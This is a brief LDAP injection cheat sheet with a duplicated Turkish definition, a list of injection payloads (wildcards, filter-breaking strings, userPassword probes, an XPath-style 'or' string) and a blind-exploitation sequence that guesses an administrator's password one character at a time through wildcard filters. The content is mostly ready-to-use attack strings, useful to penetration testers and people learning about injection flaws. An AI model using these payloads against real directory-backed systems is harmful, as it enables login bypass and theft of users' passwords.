LDAP Injection

LDAP injectionun bir kriterin listelendiği alanlara bazı karakterler sıkıştırarak tüm sonuçların gösterilmesi veya istenen kişilerinşifrelerinin alınması gibidir.LDAP injectionun bir kriterin listelendiği alanlara bazı karakterler sıkıştırarak tüm sonuçlarıngösterilmesi veya istenen kişilerin şifrelerinin alınması gibidir.

Payloads

*
*)(&
*))%00
)(cn=))\x00
*()|%26'
*()|&'
*(|(mail=*))
*(|(objectclass=*))
*)(uid=*))(|(uid=*
*/*
*|
/
//
//*
@*
|
admin*
admin*)((|userpassword=*)
admin*)((|userPassword=*)
x' or name()='username' or 'x'='y

Blind Exploitation

We can extract using a bypass login

(&(sn=administrator)(password=*))    : OK
(&(sn=administrator)(password=A*))   : KO
(&(sn=administrator)(password=B*))   : KO
...
(&(sn=administrator)(password=M*))   : OK
(&(sn=administrator)(password=MA*))  : KO
(&(sn=administrator)(password=MB*))  : KO
...
(&(sn=administrator)(password=MY*))  : OK
(&(sn=administrator)(password=MYA*)) : KO
(&(sn=administrator)(password=MYB*)) : KO
(&(sn=administrator)(password=MYC*)) : KO
...
(&(sn=administrator)(password=MYK*)) : OK
(&(sn=administrator)(password=MYKE)) : OK